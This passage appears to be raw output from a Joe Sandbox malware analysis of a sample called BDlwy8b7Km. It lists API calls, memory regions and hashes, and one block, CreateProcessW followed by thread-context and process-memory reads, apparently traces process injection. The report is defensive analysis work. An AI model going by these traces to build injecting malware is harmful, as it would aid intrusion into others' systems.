                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0059DB9F
                                                  • Sleep.KERNEL32(0000000A), ref: 0059DBB1
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 005E1CC9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                  • String ID:
                                                  • API String ID: 3288985973-0
                                                  • Opcode ID: a536d47e38a4d31c3371953b09fb6d5f5ab981831293abdff46230682059ca26
                                                  • Instruction ID: eb807aa41b1e725ba5f4a154a6e0711c71e3e74da6d16ac5c04dc08c2886c2e4
                                                  • Opcode Fuzzy Hash: a536d47e38a4d31c3371953b09fb6d5f5ab981831293abdff46230682059ca26
                                                  • Instruction Fuzzy Hash: 27F05E306447809BEB34CB608C49FAA7BBAFB85350F105A19E64AD70C0DB3494898B25
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00602CD4,?,?,?,00000004,00000001), ref: 00602FF2
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00602CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00603006
                                                  • CloseHandle.KERNEL32(00000000,?,00602CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0060300D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: 62c4548f2b7254194b89f37a898dae9b6d661e9e2627e6f868460c2bcf393e99
                                                  • Instruction ID: 9d217300ec5ad92442902e5f85d5b3e41016f75a88b1ed9124570ef33fec7032
                                                  • Opcode Fuzzy Hash: 62c4548f2b7254194b89f37a898dae9b6d661e9e2627e6f868460c2bcf393e99
                                                  • Instruction Fuzzy Hash: 8FE08636281B2077D3341755BC0EFCF3A1DD786B75F104210FB19751D046A0151242A8
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 005A17F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer
                                                  • String ID: CALL
                                                  • API String ID: 1385522511-4196123274
                                                  • Opcode ID: 84e1019e618115861b8fb9849afa7fa3c45473b9dea8fc6f033bbea8526f5e26
                                                  • Instruction ID: 1b937c185f2c5d59bfaf2dd23bfc3857c4b275dfaa7d4e19dd484a80c0cec187
                                                  • Opcode Fuzzy Hash: 84e1019e618115861b8fb9849afa7fa3c45473b9dea8fc6f033bbea8526f5e26
                                                  • Instruction Fuzzy Hash: 0A2289706086429FC714DF25C494A2EBFF2BF9A394F14891DF4968B3A2D731E841CB96
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00606F6B
                                                    • Part of subcall function 00594ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad_wcslen
                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                  • API String ID: 3312870042-2806939583
                                                  • Opcode ID: 83ad2029c4d76a3f01f05739924972cbb320ca7f4a0d09268c51dd4303bd28fb
                                                  • Instruction ID: c541ccd6523f9e51464eb2f0b98ff6553bdc4dc72e357fb7f677e49167ffbe03
                                                  • Opcode Fuzzy Hash: 83ad2029c4d76a3f01f05739924972cbb320ca7f4a0d09268c51dd4303bd28fb
                                                  • Instruction Fuzzy Hash: 66B173715082029FCB18EF24C4959AFBBE6BFD4310F04495DF496972A2EB30ED49CB92
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0165B44B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0165B4E1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0165B503
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                  • Instruction ID: 544e3d33cfa662be414f32a25a6db7e5006cf1f5ba8732f8bd96dbfc1fff16ff
                                                  • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                  • Instruction Fuzzy Hash: 5112CE24E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CB5A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: 660b65701555f5af6121f20e75f1ed4dbcc23e801277cea301feaa9d3e64d07f
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: DB31F2B4A04109DBC719DF9AD49096DFBA2FF4A310B2486A5E80ACF656D731EDC1CBD0
                                                  APIs
                                                    • Part of subcall function 00594E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E9C
                                                    • Part of subcall function 00594E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00594EAE
                                                    • Part of subcall function 00594E90: FreeLibrary.KERNEL32(00000000,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EC0
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EFD
                                                    • Part of subcall function 00594E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E62
                                                    • Part of subcall function 00594E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00594E74
                                                    • Part of subcall function 00594E59: FreeLibrary.KERNEL32(00000000,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E87
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressFreeProc
                                                  • String ID:
                                                  • API String ID: 2632591731-0
                                                  • Opcode ID: 6a43e5b62880273ba98689438a62e0d937168a2f5645cfdd705b2dea8257ac04
                                                  • Instruction ID: 76fe431d9dfac6d021f59cbf5fc179fc3b4e4432f0c621adb994423e4c8c0ec1
                                                  • Opcode Fuzzy Hash: 6a43e5b62880273ba98689438a62e0d937168a2f5645cfdd705b2dea8257ac04
                                                  • Instruction Fuzzy Hash: 7B11EB32650207AACF25AF64DC0AFAD7BA5BF80750F10441EF542A62D1EE709E469B51
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: __wsopen_s
                                                  • String ID:
                                                  • API String ID: 3347428461-0
                                                  • Opcode ID: 0268e9729ddaaf4bf4d31b738330da76a20dc8fe7c65f855ececd595a0bf43e9
                                                  • Instruction ID: be810104965009ec17f7ab793b787ae317d489cb4687448643ed234fd5e51be6
                                                  • Opcode Fuzzy Hash: 0268e9729ddaaf4bf4d31b738330da76a20dc8fe7c65f855ececd595a0bf43e9
                                                  • Instruction Fuzzy Hash: 5F11487190410AAFCF09DF98E940EAA7BF5FF48304F144069F808AB312DA31EA11CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                  • Instruction ID: f37bb40cde6234f3ae873af3f691605a83a7303d82b97cfe8f9163fcb572a2bd
                                                  • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                  • Instruction Fuzzy Hash: 1DF0F932510A159EC7313EA5AC0EFDA3F98BFD2334F140719F825921D1DB70B80186A5
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 677ef260b211077d3ec3e1441ffea276283e8a04759a8108b308ec58f605610d
                                                  • Instruction ID: 5f4107290d46c86431c8ec010a23caa095d043f4f47d6096b8fd60cabca0e32c
                                                  • Opcode Fuzzy Hash: 677ef260b211077d3ec3e1441ffea276283e8a04759a8108b308ec58f605610d
                                                  • Instruction Fuzzy Hash: B8E0E53110622D5EE7312AE69C19FDA3E59BB827B0F058028FC0596581CB10ED0186E1
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594F6D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: cdef830572adf398378bea6ca54fc2eab9f33d73da1a0ebb8021cad874054402
                                                  • Instruction ID: d88267d98496435380d118bcbdfe67abf218691a650b0ed54c97d0fe815bf4fc
                                                  • Opcode Fuzzy Hash: cdef830572adf398378bea6ca54fc2eab9f33d73da1a0ebb8021cad874054402
                                                  • Instruction Fuzzy Hash: DAF01571105792CFDB349F64E494C66BBE4BF143293248A6EE1EA82621C731AC45DF10
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00592DC4
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_wcslen
                                                  • String ID:
                                                  • API String ID: 541455249-0
                                                  • Opcode ID: 49a6867d2e7e3a8248da39e1a8ecd1e2d1262c943e8c9ddcc9f5c1ffb76a5816
                                                  • Instruction ID: 927051ff937b76dff98442e8a356f9d1162246e9f642e407efc2bea95632595e
                                                  • Opcode Fuzzy Hash: 49a6867d2e7e3a8248da39e1a8ecd1e2d1262c943e8c9ddcc9f5c1ffb76a5816
                                                  • Instruction Fuzzy Hash: FDE0CD726001255BCB209398DC09FDA77DDEFC8790F040072FD09D7248D960AD848550
                                                  APIs
                                                    • Part of subcall function 00593837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00593908
                                                    • Part of subcall function 0059D730: GetInputState.USER32 ref: 0059D807
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00592B6B
                                                    • Part of subcall function 005930F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0059314E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                  • String ID:
                                                  • API String ID: 3667716007-0
                                                  • Opcode ID: f264bcc6cc8dd938bd13eadc0387728521a324dd5930a66b6f28da9a0d7c9035
                                                  • Instruction ID: f2ee5b62ba9da76ec20344fed38f9d2ddb178de5c77912a67686b6be41374267
                                                  • Opcode Fuzzy Hash: f264bcc6cc8dd938bd13eadc0387728521a324dd5930a66b6f28da9a0d7c9035
                                                  • Instruction Fuzzy Hash: 04E0262130020646CF08BB75981A5BDAF9AFBE2351F40143EF14287162CE244A464252
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,00000000,?,005D0704,?,?,00000000,?,005D0704,00000000,0000000C), ref: 005D03B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 1745c2bf8ffe0b1166d04d65153237ab08878d251097f6f6436c731bdc89d2bb
                                                  • Instruction ID: b3d54ec9c6f92f5315e723a480a908e82a05fe97990a7f3ef58d7eba743681f4
                                                  • Opcode Fuzzy Hash: 1745c2bf8ffe0b1166d04d65153237ab08878d251097f6f6436c731bdc89d2bb
                                                  • Instruction Fuzzy Hash: 71D06C3204010DBBDF128F84DD06EDA3BAAFB48714F014000BE1856020C732E832AB90
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00591CBC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem
                                                  • String ID:
                                                  • API String ID: 3098949447-0
                                                  • Opcode ID: 17258973a4a3c627eab4d57cf8ed83d477715faa4ef7ec776edffefb20490c9f
                                                  • Instruction ID: 8449adf88e6d1822af87a634b21f353b39786e2918d71e2c018d69d6d73c5fae
                                                  • Opcode Fuzzy Hash: 17258973a4a3c627eab4d57cf8ed83d477715faa4ef7ec776edffefb20490c9f
                                                  • Instruction Fuzzy Hash: C8C09B352807059FF3244780FC5AF147756A759B10F045001F60A795E3C3E15430D650
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 0165BCA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: cf62de77a73f9674c576dd12f0ce5f92f09168452377da14594a7eb8977cc4ad
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: F3E0E67494010DDFDB00EFB4DA4969E7FB4FF04301F100165FD01D2281DA309D508A62
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0062961A
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0062965B
                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0062969F
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006296C9
                                                  • SendMessageW.USER32 ref: 006296F2
                                                  • GetKeyState.USER32(00000011), ref: 0062978B
                                                  • GetKeyState.USER32(00000009), ref: 00629798
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006297AE
                                                  • GetKeyState.USER32(00000010), ref: 006297B8
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006297E9
                                                  • SendMessageW.USER32 ref: 00629810
                                                  • SendMessageW.USER32(?,00001030,?,00627E95), ref: 00629918
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0062992E
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00629941
                                                  • SetCapture.USER32(?), ref: 0062994A
                                                  • ClientToScreen.USER32(?,?), ref: 006299AF
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006299BC
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006299D6
                                                  • ReleaseCapture.USER32 ref: 006299E1
                                                  • GetCursorPos.USER32(?), ref: 00629A19
                                                  • ScreenToClient.USER32(?,?), ref: 00629A26
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00629A80
                                                  • SendMessageW.USER32 ref: 00629AAE
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00629AEB
                                                  • SendMessageW.USER32 ref: 00629B1A
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00629B3B
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00629B4A
